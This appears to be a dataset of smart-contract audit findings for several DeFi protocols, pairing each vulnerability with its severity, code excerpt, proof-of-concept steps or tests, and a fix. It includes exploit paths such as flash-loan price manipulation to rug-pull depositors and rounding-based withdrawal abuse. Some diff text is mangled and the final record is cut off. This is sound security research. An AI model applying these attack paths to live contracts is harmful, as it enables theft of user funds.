1) Make `StratFeeManagerInitializable::setUnirouter` `virtual` such that it can be overridden by child contracts. 2) `StrategyPassiveManagerUniswap` should override `setUnirouter` to remove all allowances before calling the parent function to update `unirouter`.
The old `unirouter` contract will continue to have ERC20 token approvals for `StratFeeManagerInitializable` so it can continue to spend the protocol's tokens when this is not the protocol's intention as the protocol has changed `unirouter`.
```\\nfunction _giveAllowances() private {\\n IERC20Metadata(lpToken0).forceApprove(unirouter, type(uint256).max);\\n IERC20Metadata(lpToken1).forceApprove(unirouter, type(uint256).max);\\n}\\n```\\n
Owner of `StrategyPassiveManagerUniswap` can rug-pull users' deposited tokens by manipulating `onlyCalmPeriods` parameters
low
While `StrategyPassiveManagerUniswap` does have some permissioned roles, one of the attack paths we were asked to check was that the permissioned roles could not rug-pull the users' deposited tokens. There is a way that the owner of the `StrategyPassiveManagerUniswap` contract could accomplish this by modifying key parameters to reduce the effectiveness of the `_onlyCalmPeriods` check. This appears to be how a similar protocol Gamma was exploited.\\nProof of Concept:\\nOwner calls `StrategyPassiveManagerUniswap::setDeviation` to increase the maximum allowed deviations to large numbers or alternatively `setTwapInterval` to decrease the twap interval rendering it ineffective\\nOwner takes a flash loan and uses it to manipulate `pool.slot0` to a high value\\nOwner calls `BeefyVaultConcLiq::deposit` to perform a deposit; the shares are calculated thus:\\n```\\n// @audit `price` is derived from `pool.slot0`\\nshares = _amount1 + (_amount0 * price / PRECISION);\\n```\\n\\nAs `price` is derived from `pool.slot0` which has been inflated, the owner will receive many more shares than they normally would\\nOwner unwinds the flash loan returning `pool.slot0` back to its normal value\\nOwner calls `BeefyVaultConcLiq::withdraw` to receive many more tokens than they should be able to due to the inflated share count they received from the deposit
Beefy already intends to have all owner functions behind a timelocked multi-sig and if these transactions are attempted the suspicious parameters would be an obvious signal that a future attack is coming. Because of this the probability of this attack being effectively executed is low though it is still possible.\\nOne way to further mitigate this attack would be to have a minimum required twap interval and maximum required deviation amounts such that the owner couldn't change these parameters to values which would enable this attack.
Owner of `StrategyPassiveManagerUniswap` can rug-pull users' deposited tokens.
```\\n// @audit `price` is derived from `pool.slot0`\\nshares = _amount1 + (_amount0 * price / PRECISION);\\n```\\n
`_onlyCalmPeriods` does not consider MIN/MAX ticks, which can DOS deposit, withdraw and harvest in edge cases
low
In Uniswap V3 liquidity providers can only provide liquidity between price ranges `[1.0001^{MIN_ TICK};1.0001^{MAX_TICK})`. Therefore these are the min and max prices.\\n```\\n function _onlyCalmPeriods() private view {\\n int24 tick = currentTick();\\n int56 twapTick = twap();\\n\\n if(\\n twapTick - maxTickDeviationNegative > tick ||\\n twapTick + maxTickDeviationPositive < tick) revert NotCalm();\\n }\\n```\\n\\nIf `twapTick - maxTickDeviationNegative < MIN_TICK`, this function would revert even if `tick` has been the same for years. This can DOS deposits, withdrawals and harvests when they should be allowed for as long as the state holds.
Consider changing the current implementation to:\\n```\\n// Add the line below\\n const int56 MIN_TICK = // Remove the line below\\n887272;\\n// Add the line below\\n const int56 MAX_TICK = 887272;\\n function _onlyCalmPeriods() private view {\\n int24 tick = currentTick();\\n int56 twapTick = twap();\\n\\n// Add the line below\\n int56 minCalmTick = max(twapTick // Remove the line below\\n maxTickDeviationNegative, MIN_TICK);\\n// Add the line below\\n int56 maxCalmTick = min(twapTick // Remove the line below\\n maxTickDeviationPositive, MAX_TICK);\\n\\n if(\\n// Remove the line below\\n twapTick // Remove the line below\\n maxTickDeviationNegative > tick ||\\n// Remove the line below\\n twapTick // Add the line below\\n maxTickDeviationPositive < tick) revert NotCalm();\\n// Add the line below\\n minCalmTick > tick ||\\n// Add the line below\\n maxCalmTick < tick) revert NotCalm();\\n }\\n```\\n
null
```\\n function _onlyCalmPeriods() private view {\\n int24 tick = currentTick();\\n int56 twapTick = twap();\\n\\n if(\\n twapTick - maxTickDeviationNegative > tick ||\\n twapTick + maxTickDeviationPositive < tick) revert NotCalm();\\n }\\n```\\n
Withdraw can return zero tokens while burning a positive amount of shares
low
Invariant fuzzing found an edge-case where a user could burn an amount of shares > 0 but receive zero output tokens. The cause appears to be a rounding down to zero precision loss for small `_shares` value in `BeefyVaultConcLiq::withdraw` L220-221:\\n```\\nuint256 _amount0 = (_bal0 * _shares) / _totalSupply;\\nuint256 _amount1 = (_bal1 * _shares) / _totalSupply;\\n```\\n
Change the slippage check to also revert if no output tokens are returned:\\n```\\nif (_amount0 < _minAmount0 || _amount1 < _minAmount1 ||\\n (_amount0 == 0 && _amount1 == 0)) revert TooMuchSlippage();\\n```\\n
Protocol can enter a state where a user burns their shares but receives zero output tokens in return.\\nProof of Concept: Invariant fuzz testing suite supplied at the conclusion of the audit.
```\\nuint256 _amount0 = (_bal0 * _shares) / _totalSupply;\\nuint256 _amount1 = (_bal1 * _shares) / _totalSupply;\\n```\\n
`SwellLib.BOT` can subtly rug-pull withdrawals by setting `_processedRate = 0` when calling `swEXIT::processWithdrawals`
medium
When users create a withdrawal request, their `swETH` is burned then the current exchange rate `rateWhenCreated` is fetched from swETH::swETHToETHRate:\\n```\\nuint256 rateWhenCreated = AccessControlManager.swETH().swETHToETHRate();\\n```\\n\\nHowever `SwellLib.BOT` can pass an arbitrary value for `_processedRate` when calling swEXIT::processWithdrawals:\\n```\\nfunction processWithdrawals(\\n uint256 _lastTokenIdToProcess,\\n uint256 _processedRate\\n) external override checkRole(SwellLib.BOT) {\\n```\\n\\nThe final rate used is the lesser of `rateWhenCreated` and _processedRate:\\n```\\nuint256 finalRate = _processedRate > rateWhenCreated\\n ? rateWhenCreated\\n : _processedRate;\\n```\\n\\nThis final rate is multiplied by the requested withdrawal amount to determine the actual amount sent to the user requesting a withdrawal:\\n```\\nuint256 requestExitedETH = wrap(amount).mul(wrap(finalRate)).unwrap();\\n```\\n\\nHence `SwellLib.BOT` can subtly rug-pull all withdrawals by setting `_processedRate = 0` when calling `swEXIT::processWithdrawals`.
Two possible mitigations:\\nChange `swEXIT::processWithdrawals` to always fetch the current rate from `swETH::swETHToETHRate`\\nOnly allow `swEXIT::processWithdrawals` to be called by the `RepricingOracle` contract which calls it correctly.
null
```\\nuint256 rateWhenCreated = AccessControlManager.swETH().swETHToETHRate();\\n```\\n
Check for staleness of data when fetching Proof of Reserves via Chainlink `Swell ETH PoR` Oracle
low
`RepricingOracle::_assertRepricingSnapshotValidity` uses the `Swell ETH PoR` Chainlink Proof Of Reserves Oracle to fetch an off-chain data source for Swell's current reserves.\\nThe Oracle `Swell ETH PoR` is listed on Chainlink's website as having a heartbeat of `86400` seconds (check the "Show More Details" box in the top-right corner of the table), however no staleness check is implemented by RepricingOracle:\\n```\\n// @audit no staleness check\\n(, int256 externallyReportedV3Balance, , , ) = AggregatorV3Interface(\\n ExternalV3ReservesPoROracle\\n).latestRoundData();\\n```\\n
Implement a staleness check and if the Oracle is stale, either revert or skip using it as the code currently does if the oracle is not set.\\nFor multi-chain deployments ensure that a correct staleness check is used for each feed as the same feed can have different heartbeats on different chains.\\nConsider adding an off-chain bot that periodically checks if the Oracle has become stale and if it has, raises an internal alert for the team to investigate.
If the `Swell ETH PoR` Chainlink Proof Of Reserves Oracle has stopped functioning correctly, `RepricingOracle::_assertRepricingSnapshotValidity` will continue processing with stale reserve data as if it were fresh.
```\\n// @audit no staleness check\\n(, int256 externallyReportedV3Balance, , , ) = AggregatorV3Interface(\\n ExternalV3ReservesPoROracle\\n).latestRoundData();\\n```\\n
Precision loss in `swETH::_deposit` from unnecessary hidden division before multiplication
low
`swETH::_deposit` L170 contains a hidden unnecessary division before multiplication as the call to `_ethToSwETHRate` performs a division which then gets multiplied by msg.value:\\n```\\nuint256 swETHAmount = wrap(msg.value).mul(_ethToSwETHRate()).unwrap();\\n// @audit expanding this out\\n// wrap(msg.value).mul(_ethToSwETHRate()).unwrap();\\n// wrap(msg.value).mul(wrap(1 ether).div(_swETHToETHRate())).unwrap();\\n```\\n\\nThis issue has not been introduced in the new changes but is in the mainnet code.
Refactor to perform multiplication before division:\\n```\\nuint256 swETHAmount = wrap(msg.value).mul(wrap(1 ether)).div(_swETHToETHRate()).unwrap();\\n```\\n
Slightly less `swETH` will be minted to depositors. While the amount by which individual depositors are short-changed is individually small, the effect is cumulative and increases as depositors and deposit size increase.\\nProof of Concept: This stand-alone stateless fuzz test can be run inside Foundry to prove this as well as provided hard-coded test cases:\\n```\\n// SPDX-License-Identifier: MIT\\npragma solidity ^0.8.23;\\n\\nimport {UD60x18, wrap} from "@prb/math/src/UD60x18.sol";\\n\\nimport "forge-std/Test.sol";\\n\\n// run from base project directory with:\\n// (fuzz test) forge test --match-test FuzzMint -vvv\\n// (hardcoded) forge test --match-test HardcodedMint -vvv\\ncontract MintTest is Test {\\n\\n uint256 private constant SWETH_ETH_RATE = 1050754209601187151; //as of 2024-02-15\\n\\n function _mintOriginal(uint256 inputAmount) private pure returns(uint256) {\\n // hidden division before multiplication\\n // wrap(inputAmount).mul(_ethToSwETHRate()).unwrap();\\n // wrap(inputAmount).mul(wrap(1 ether).div(_swETHToETHRate())).unwrap()\\n\\n return wrap(inputAmount).mul(wrap(1 ether).div(wrap(SWETH_ETH_RATE))).unwrap();\\n }\\n\\n function _mintFixed(uint256 inputAmount) private pure returns(uint256) {\\n // refactor to perform multiplication before division\\n // wrap(inputAmount).mul(wrap(1 ether)).div(_swETHToETHRate()).unwrap();\\n\\n return wrap(inputAmount).mul(wrap(1 ether)).div(wrap(SWETH_ETH_RATE)).unwrap();\\n }\\n\\n function test_FuzzMint(uint256 inputAmount) public pure {\\n uint256 resultOriginal = _mintOriginal(inputAmount);\\n uint256 resultFixed = _mintFixed(inputAmount);\\n\\n assert(resultOriginal == resultFixed);\\n }\\n\\n function test_HardcodedMint() public {\\n // found by fuzzer\\n console.log(_mintFixed(3656923177187149889) - _mintOriginal(3656923177187149889)); // 1\\n\\n // 100 eth\\n console.log(_mintFixed(100 ether) - _mintOriginal(100 ether)); // 21\\n\\n // 1000 eth\\n console.log(_mintFixed(1000 ether) - _mintOriginal(1000 ether)); // 215\\n\\n // 10000 eth\\n console.log(_mintFixed(10000 ether) - _mintOriginal(10000 ether)); // 2159\\n }\\n}\\n```\\n
```\\nuint256 swETHAmount = wrap(msg.value).mul(_ethToSwETHRate()).unwrap();\\n// @audit expanding this out\\n// wrap(msg.value).mul(_ethToSwETHRate()).unwrap();\\n// wrap(msg.value).mul(wrap(1 ether).div(_swETHToETHRate())).unwrap();\\n```\\n
Attacker can abuse `RewardsDistributor::triggerRoot` to block reward claims and unpause a paused state
medium
Consider the code of RewardsDistributor::triggerRoot:\\n```\\n function triggerRoot() external {\\n bytes32 rootCandidateAValue = rootCandidateA.value;\\n if (rootCandidateAValue != rootCandidateB.value || rootCandidateAValue == bytes32(0)) revert RootCandidatesInvalid();\\n root = Root({value: rootCandidateAValue, lastUpdatedAt: block.timestamp});\\n emit RootChanged(msg.sender, rootCandidateAValue);\\n }\\n```\\n\\nThis function:\\ncan be called by anyone\\nif it succeeds, sets `root.value` to `rootCandidateA.value` and `root.lastUpdatedAt` to `block.timestamp`\\ndoesn't reset `rootCandidateA` or `rootCandidateB`, so it can be called over and over again to continually update `root.lastUpdatedAt` or to set `root.value` to `rootCandidateA.value`.
Two possible options:\\nMake `RewardsDistributor::triggerRoot` a permissioned function such that an attacker can't call it\\nChange `RewardsDistributor::triggerRoot` to reset `rootCandidateA.value = zeroRoot` such that it can't be successfully called repeatedly.
An attacker can abuse this function in 2 ways:\\nby calling it repeatedly an attacker can continually increase `root.lastUpdatedAt` to trigger the claim delay revert in `RewardsDistributor::claimAll` effectively blocking reward claims\\nby calling it after reward claims have been paused, an attacker can effectively unpause the paused state since `root.value` is over-written with the valid value from `rootCandidateA.value` and claim pausing works by setting `root.value == zeroRoot`.
```\\n function triggerRoot() external {\\n bytes32 rootCandidateAValue = rootCandidateA.value;\\n if (rootCandidateAValue != rootCandidateB.value || rootCandidateAValue == bytes32(0)) revert RootCandidatesInvalid();\\n root = Root({value: rootCandidateAValue, lastUpdatedAt: block.timestamp});\\n emit RootChanged(msg.sender, rootCandidateAValue);\\n }\\n```\\n
`RewardsDistributor` doesn't correctly handle deposits of fee-on-transfer incentive tokens
medium
`the kenneth` stated in telegram that Fee-On-Transfer tokens are fine to use as incentive tokens with `RewardsDistributor`, however when receiving Fee-On-Transfer tokens and storing the reward amount the accounting does not account for the fee deducted from the transfer amount in-transit, for example:\\n```\\nfunction _depositLPIncentive(\\n StoredReward memory reward,\\n uint256 amount,\\n uint256 periodReceived\\n) private {\\n IERC20(reward.token).safeTransferFrom(\\n msg.sender,\\n address(this),\\n amount\\n );\\n\\n // @audit stored `amount` here will be incorrect since it doesn't account for\\n // the actual amount received after the transfer fee was deducted in-transit\\n _storeReward(periodReceived, reward, amount);\\n}\\n```\\n
In `RewardsDistributor::_depositLPIncentive` & depositVoteIncentive:\\nread the `before` transfer token balance of `RewardsDistributor` contract\\nperform the token transfer\\nread the `after` transfer token balance of `RewardsDistributor` contract\\ncalculate the difference between the `after` and `before` balances to get the true amount that was received by the `RewardsDistributor` contract accounting for the fee that was deducted in-transit\\nuse the true received amount to generate events and write the received incentive token amounts to `RewardsDistributor::periodRewards`.\\nAlso note that `RewardsDistributor::periodRewards` is never read in the contract, only written to. If it is not used by off-chain processing then consider removing it.
The actual reward calculation is done off-chain and is outside the audit scope nor do we have visibility of that code. But events emitted by `RewardsDistributor` and the stored incentive token deposits in `RewardsDistributor::periodRewards` use incorrect amounts for Fee-On-Transfer incentive token deposits.
```\\nfunction _depositLPIncentive(\\n StoredReward memory reward,\\n uint256 amount,\\n uint256 periodReceived\\n) private {\\n IERC20(reward.token).safeTransferFrom(\\n msg.sender,\\n address(this),\\n amount\\n );\\n\\n // @audit stored `amount` here will be incorrect since it doesn't account for\\n // the actual amount received after the transfer fee was deducted in-transit\\n _storeReward(periodReceived, reward, amount);\\n}\\n```\\n
Use low level `call()` to prevent gas griefing attacks when returned data not required
low
Using `call()` when the returned data is not required unnecessarily exposes to gas griefing attacks from huge returned data payload. For example:\\n```\\n(bool sent, ) = _to.call{value: _amount}("");\\nrequire(sent);\\n```\\n\\nIs the same as writing:\\n```\\n(bool sent, bytes memory data) = _to.call{value: _amount}("");\\nrequire(sent);\\n```\\n\\nIn both cases the returned data will be copied into memory exposing the contract to gas griefing attacks, even though the returned data is not used at all.
Use a low-level call when the returned data is not required, eg:\\n```\\nbool sent;\\nassembly {\\n sent := call(gas(), _to, _amount, 0, 0, 0, 0)\\n}\\nif (!sent) revert FailedToSendEther();\\n```\\n
Contract unnecessarily exposed to gas griefing attacks.
```\\n(bool sent, ) = _to.call{value: _amount}("");\\nrequire(sent);\\n```\\n
No precision scaling or minimum received amount check when subtracting `relayerFeeAmount` can revert due to underflow or return less tokens to user than specified
medium
`PorticoFinish::payOut` L376 attempts to subtract the `relayerFeeAmount` from the final post-bridge and post-swap token balance:\\n```\\nfinalUserAmount = finalToken.balanceOf(address(this)) - relayerFeeAmount;\\n```\\n\\nThere is no precision scaling to ensure that PorticoFinish's token contract balance and `relayerFeeAmount` are in the same decimal precision; if the `relayerFeeAmount` has 18 decimal places but the token is USDC with only 6 decimal places, this can easily revert due to underflow resulting in the bridged tokens being stuck.\\nAn excessively high `relayerFeeAmount` could also significantly reduce the amount of post-bridge and post-swap tokens received as there is no check on the minimum amount of tokens the user will receive after deducting `relayerFeeAmount`. This current configuration is an example of the "MinTokensOut For Intermediate, Not Final Amount" vulnerability class; as the minimum received tokens check is before the deduction of `relayerFeeAmount` a user will always receive less tokens than their specified minimum if `relayerFeeAmount > 0`.
Ensure that token balance and `relayerFeeAmount` have the same decimal precision before combining them. Alternatively check for underflow and don't charge a fee if this would be the case. Consider enforcing the user-specified minimum output token check again when deducting `relayerFeeAmount`, and if this would fail then decrease `relayerFeeAmount` such that the user at least receives their minimum specified token amount.\\nAnother option is to check that even if it doesn't underflow, that the remaining amount after subtracting `relayerFeeAmount` is a high percentage of the bridged amount; this would prevent a scenario where `relayerFeeAmount` takes a large part of the bridged amount, effectively capping `relayerFeeAmount` to a tiny % of the post-bridge and post-swap funds. This scenario can still result in the user receiving less tokens than their specified minimum however.\\nFrom the point of view of the smart contract, it should protect itself against the possibility of the token amount and `relayerFeeAmount` being in different decimals or that `relayerFeeAmount` would be too high, similar to how for example L376 inside `payOut` doesn't trust the bridge reported amount and checks the actual token balance.
Bridged tokens stuck or user receives less tokens than their specified minimum.
```\\nfinalUserAmount = finalToken.balanceOf(address(this)) - relayerFeeAmount;\\n```\\n
Use low level `call()` to prevent gas griefing attacks when returned data not required
low
Using `call()` when the returned data is not required unnecessarily exposes to gas griefing attacks from huge returned data payload. For example:\\n```\\n(bool sentToUser, ) = recipient.call{ value: finalUserAmount }("");\\nrequire(sentToUser, "Failed to send Ether");\\n```\\n\\nIs the same as writing:\\n```\\n(bool sentToUser, bytes memory data) = recipient.call{ value: finalUserAmount }("");\\nrequire(sentToUser, "Failed to send Ether");\\n```\\n\\nIn both cases the returned data will be copied into memory exposing the contract to gas griefing attacks, even though the returned data is not used at all.
Use a low-level call when the returned data is not required, eg:\\n```\\nbool sent;\\nassembly {\\n sent := call(gas(), recipient, finalUserAmount, 0, 0, 0, 0)\\n}\\nif (!sent) revert Unauthorized();\\n```\\n\\nConsider using ExcessivelySafeCall.
Contract unnecessarily exposed to gas griefing attacks.
```\\n(bool sentToUser, ) = recipient.call{ value: finalUserAmount }("");\\nrequire(sentToUser, "Failed to send Ether");\\n```\\n
The previous milestone stem should be scaled for use with the new gauge point system which uses untruncated values moving forward
high
Within the Beanstalk Silo, the milestone stem for a given token is the cumulative amount of grown stalk per BDV for this token at the last `stalkEarnedPerSeason` update. Previously, the milestone stem was stored in its truncated representation; however, the seed gauge system now stores the value in its untruncated form due to the new granularity of grown stalk and the frequency with which these values are updated.\\nAt the time of upgrade, the previous (truncated) milestone stem for each token should be scaled for use with the gauge point system by multiplying up by a factor of `1e6`. Otherwise, there will be a mismatch in decimals when calculating the stem tip.\\n```\\n_stemTipForToken = s.ss[token].milestoneStem +\\n int96(s.ss[token].stalkEarnedPerSeason).mul(\\n int96(s.season.current).sub(int96(s.ss[token].milestoneSeason))\\n );\\n```\\n
Scale up the existing milestone stem for each token:\\n```\\nfor (uint i = 0; i < siloTokens.length; i// Add the line below\\n// Add the line below\\n) {\\n// Add the line below\\n s.ss[siloTokens[i]].milestoneStem = int96(s.ss[siloTokens[i]].milestoneStem.mul(1e6));\\n```\\n\\n\\clearpage
The mixing of decimals between the old milestone stem (truncated) and the new milestone stem (untruncated, after the first `gm` call following the BIP-39 upgrade) breaks the existing grown stalk accounting, resulting in a loss of grown stalk for depositors.\\nProof of Concept: The previous implementation returns the cumulative stalk per BDV with 4 decimals:\\n```\\n function stemTipForToken(address token)\\n internal\\n view\\n returns (int96 _stemTipForToken)\\n {\\n AppStorage storage s = LibAppStorage.diamondStorage();\\n\\n // SafeCast unnecessary because all casted variables are types smaller that int96.\\n _stemTipForToken = s.ss[token].milestoneStem +\\n int96(s.ss[token].stalkEarnedPerSeason).mul(\\n int96(s.season.current).sub(int96(s.ss[token].milestoneSeason))\\n ).div(1e6); //round here\\n }\\n```\\n\\nWhich can be mathematically abstracted to: $$StemTip(token) = getMilestonStem(token) + (current \\ season - getMilestonStemSeason(token)) \\times \\frac{stalkEarnedPerSeason(token)}{10^{6}}$$\\nThis division by $10^{6}$ happens because the stem tip previously had just 4 decimals. This division allows backward compatibility by not considering the final 6 decimals. Therefore, the stem tip MUST ALWAYS have 4 decimals.\\nThe milestone stem is now updated in each `gm` call so long as all LP price oracles pass their respective checks. Notably, the milestone stem is now stored with 10 decimals (untruncated), hence why the second term of the abstraction has omited the `10^{6}` division in `LibTokenSilo::stemTipForTokenUntruncated`.\\nHowever, if the existing milestone stem is not escalated by $10^{6}$ then the addition performed during the upgrade and in subsequent `gm` calls makes no sense. This is mandatory to be handled within the upgrade otherwise every part of the protocol which calls `LibTokenSilo.stemTipForToken` will receive an incorrect value, except for BEAN:ETH Well LP (given it was created after the Silo v3 upgrade).\\nSome instances where this function is used include:\\n`EnrootFacet::enrootDeposit`\\n`EnrootFacet::enrootDeposits`\\n`MetaFacet::uri`\\n`ConvertFacet::_withdrawTokens`\\n`LibSilo::__mow`\\n`LibSilo::_removeDepositFromAccount`\\n`LibSilo::_removeDepositsFromAccount`\\n`Silo::_plant`\\n`TokenSilo::_deposit`\\n`TokenSilo::_transferDeposits`\\n`LibLegacyTokenSilo::_mowAndMigrate`\\n`LibTokenSilo::_mowAndMigrate`\\nAs can be observed, critical parts of the protocol are compromised, leading to further cascading issues.
```\\n_stemTipForToken = s.ss[token].milestoneStem +\\n int96(s.ss[token].stalkEarnedPerSeason).mul(\\n int96(s.season.current).sub(int96(s.ss[token].milestoneSeason))\\n );\\n```\\n
Both reserves should be checked in `LibWell::getWellPriceFromTwaReserves`
low
```\\nfunction getWellPriceFromTwaReserves(address well) internal view returns (uint256 price) {\\n AppStorage storage s = LibAppStorage.diamondStorage();\\n // s.twaReserve[well] should be set prior to this function being called.\\n // 'price' is in terms of reserve0:reserve1.\\n if (s.twaReserves[well].reserve0 == 0) {\\n price = 0;\\n } else {\\n price = s.twaReserves[well].reserve0.mul(1e18).div(s.twaReserves[well].reserve1);\\n }\\n}\\n```\\n\\nCurrently, `LibWell::getWellPriceFromTwaReserves` sets the price to zero if the time-weighted average reserves of the zeroth reserve (for Wells, Bean) is zero. Given the implementation of `LibWell::setTwaReservesForWell`, and that a Pump failure will return an empty reserves array, it does not appear possible to encounter the case where one reserve can be zero without the other except for perhaps an exploit or migration scenario. Therefore, whilst unlikely, it is best to but best to ensure both reserves are non-zero to avoid a potential division by zero `reserve1` when calculating the price as a revert here would result in DoS of `SeasonFacet::gm`.\\n```\\nfunction setTwaReservesForWell(address well, uint256[] memory twaReserves) internal {\\n AppStorage storage s = LibAppStorage.diamondStorage();\\n // if the length of twaReserves is 0, then return 0.\\n // the length of twaReserves should never be 1, but\\n // is added for safety.\\n if (twaReserves.length < 1) {\\n delete s.twaReserves[well].reserve0;\\n delete s.twaReserves[well].reserve1;\\n } else {\\n // safeCast not needed as the reserves are uint128 in the wells.\\n s.twaReserves[well].reserve0 = uint128(twaReserves[0]);\\n s.twaReserves[well].reserve1 = uint128(twaReserves[1]);\\n }\\n}\\n```\\n\\nAdditionally, to correctly implement the check identified by the comment in `LibWell::setTwaReservesForWell`, the time-weighted average reserves in storage should be reset if the array length is less-than or equal-to 1.
```\\n// LibWell::getWellPriceFromTwaReserves`\\n// Remove the line below\\n if (s.twaReserves[well].reserve0 == 0) {\\n// Add the line below\\n if (s.twaReserves[well].reserve0 == 0 || s.twaReserves[well].reserve1 == 0) {\\n price = 0;\\n} else {\\n\\n// LibWell::setTwaReservesForWell\\n// Remove the line below\\n if (twaReserves.length < 1) {\\n// Add the line below\\n if (twaReserves.length <= 1) {\\n delete s.twaReserves[well].reserve0;\\n delete s.twaReserves[well].reserve1;\\n} else {\\n```\\n
null
```\\nfunction getWellPriceFromTwaReserves(address well) internal view returns (uint256 price) {\\n AppStorage storage s = LibAppStorage.diamondStorage();\\n // s.twaReserve[well] should be set prior to this function being called.\\n // 'price' is in terms of reserve0:reserve1.\\n if (s.twaReserves[well].reserve0 == 0) {\\n price = 0;\\n } else {\\n price = s.twaReserves[well].reserve0.mul(1e18).div(s.twaReserves[well].reserve1);\\n }\\n}\\n```\\n
Small unripe token withdrawals don't decrease BDV and Stalk
low
For any whitelisted token where `bdvCalc(amountDeposited) < amountDeposited`, a user can deposit that token and then withdraw in small amounts to avoid decreasing BDV and Stalk. This is achieved by exploiting a rounding down to zero precision loss in LibTokenSilo::removeDepositFromAccount:\\n```\\n// @audit small unripe bean withdrawals don't decrease BDV and Stalk\\n// due to rounding down to zero precision loss. Every token where\\n// `bdvCalc(amountDeposited) < amountDeposited` is vulnerable\\nuint256 removedBDV = amount.mul(crateBDV).div(crateAmount);\\n```\\n
`LibTokenSilo::removeDepositFromAccount` should revert if `removedBDV == 0`. A similar check already exists in `LibTokenSilo::depositWithBDV` but is missing in `removeDepositFromAccount()` when calculating `removedBDV` for partial withdrawals.\\nThe breaking of protocol invariants could lead to other serious issues that have not yet been identified but may well exist if core properties do not hold. We would urge the team to consider fixing this bug as soon as possible, prior to or as part of the BIP-39 upgrade.
An attacker can withdraw deposited assets without decreasing BDV and Stalk. While the cost to perform this attack is likely more than the value an attacker would stand to gain, the potential impact should definitely be explored more closely especially considering the introduction of the Unripe Chop Convert in BIP-39 as this could have other unintended consequences in relation to this bug (given that the inflated BDV of an Unripe Token will persist once deposit is converted to its ripe counterpart, potentially allowing value to be extracted that way depending on how this BDV is used/manipulated elsewhere).\\nThe other primary consideration for this bug is that it breaks the mechanism that Stalk is supposed to be lost when withdrawing deposited assets and keeps the `totalDepositedBdv` artificially high, violating the invariant that the `totalDepositedBdv` value for a token should be the sum of the BDV value of all the individual deposits.\\nProof of Concept: Add this PoC to `SiloToken.test.js` under the section describe("1 deposit, some", async function () {:\\n```\\nit('audit small unripe bean withdrawals dont decrease BDV and Stalks', async function () {\\n let initialUnripeBeanDeposited = to6('10');\\n let initialUnripeBeanDepositedBdv = '2355646';\\n let initialTotalStalk = pruneToStalk(initialUnripeBeanDeposited).add(toStalk('0.5'));\\n\\n // verify initial state\\n expect(await this.silo.getTotalDeposited(UNRIPE_BEAN)).to.eq(initialUnripeBeanDeposited);\\n expect(await this.silo.getTotalDepositedBdv(UNRIPE_BEAN)).to.eq(initialUnripeBeanDepositedBdv);\\n expect(await this.silo.totalStalk()).to.eq(initialTotalStalk);\\n\\n // snapshot EVM state as we want to restore it after testing the normal\\n // case works as expected\\n let snapshotId = await network.provider.send('evm_snapshot');\\n\\n // normal case: withdrawing total UNRIPE_BEAN correctly decreases BDV & removes stalks\\n const stem = await this.silo.seasonToStem(UNRIPE_BEAN, '10');\\n await this.silo.connect(user).withdrawDeposit(UNRIPE_BEAN, stem, initialUnripeBeanDeposited, EXTERNAL);\\n\\n // verify UNRIPE_BEAN totalDeposited == 0\\n expect(await this.silo.getTotalDeposited(UNRIPE_BEAN)).to.eq('0');\\n // verify UNRIPE_BEAN totalDepositedBDV == 0\\n expect(await this.silo.getTotalDepositedBdv(UNRIPE_BEAN)).to.eq('0');\\n // verify silo.totalStalk() == 0\\n expect(await this.silo.totalStalk()).to.eq('0');\\n\\n // restore EVM state to snapshot prior to testing normal case\\n await network.provider.send("evm_revert", [snapshotId]);\\n\\n // re-verify initial state\\n expect(await this.silo.getTotalDeposited(UNRIPE_BEAN)).to.eq(initialUnripeBeanDeposited);\\n expect(await this.silo.getTotalDepositedBdv(UNRIPE_BEAN)).to.eq(initialUnripeBeanDepositedBdv);\\n expect(await this.silo.totalStalk()).to.eq(initialTotalStalk);\\n\\n // attacker case: withdrawing small amounts of UNRIPE_BEAN doesn't decrease\\n // BDV and doesn't remove stalks. This lets an attacker withdraw their deposits\\n // without losing Stalks & breaks the invariant that the totalDepositedBDV should\\n // equal the sum of the BDV of all individual deposits\\n let smallWithdrawAmount = '4';\\n await this.silo.connect(user).withdrawDeposit(UNRIPE_BEAN, stem, smallWithdrawAmount, EXTERNAL);\\n\\n // verify UNRIPE_BEAN totalDeposited has been correctly decreased\\n expect(await this.silo.getTotalDeposited(UNRIPE_BEAN)).to.eq(initialUnripeBeanDeposited.sub(smallWithdrawAmount));\\n // verify UNRIPE_BEAN totalDepositedBDV remains unchanged!\\n expect(await this.silo.getTotalDepositedBdv(UNRIPE_BEAN)).to.eq(initialUnripeBeanDepositedBdv);\\n // verify silo.totalStalk() remains unchanged!\\n expect(await this.silo.totalStalk()).to.eq(initialTotalStalk);\\n});\\n```\\n\\nRun with: `npx hardhat test --grep "audit small unripe bean withdrawals dont decrease BDV and Stalks"`.\\nAdditional Mainnet fork tests have been written to demonstrate the presence of this bug in the current and post-BIP-39 deployments of Beanstalk (see Appendix B).
```\\n// @audit small unripe bean withdrawals don't decrease BDV and Stalk\\n// due to rounding down to zero precision loss. Every token where\\n// `bdvCalc(amountDeposited) < amountDeposited` is vulnerable\\nuint256 removedBDV = amount.mul(crateBDV).div(crateAmount);\\n```\\n
Broken check in `MysteryBox::fulfillRandomWords()` fails to prevent same request being fulfilled multiple times
high
Consider the check which attempts to prevent the same request from being fulfilled multiple times:\\n```\\nif (vrfRequests[_requestId].fulfilled) revert InvalidVrfState();\\n```\\n\\nThe problem is that `vrfRequests[_requestId].fulfilled` is never set to `true` anywhere and `vrfRequests[_requestId]` is deleted at the end of the function.
Set `vrfRequests[_requestId].fulfilled = true`.\\nConsider an optimized version which involves having 2 mappings `activeVrfRequests` and fulfilledVrfRequests:\\nrevert `if(fulfilledVrfRequests[_requestId])`\\nelse set `fulfilledVrfRequests[_requestId] = true`\\nfetch the matching active request into memory from `activeVrfRequests[_requestId]` and continue processing as normal\\nat the end `delete activeVrfRequests[_requestId]`\\nThis only stores forever the `requestId` : `bool` pair in `fulfilledVrfRequests`.\\nConsider a similar approach in `MysteryBox::fulfillBoxAmount()`.
The same request can be fulfilled multiple times which would override the previous randomly generated seed; a malicious provider who was also a mystery box minter could generate new randomness until they got a rare mystery box.
```\\nif (vrfRequests[_requestId].fulfilled) revert InvalidVrfState();\\n```\\n
Use low level `call()` to prevent gas griefing attacks when returned data not required
low
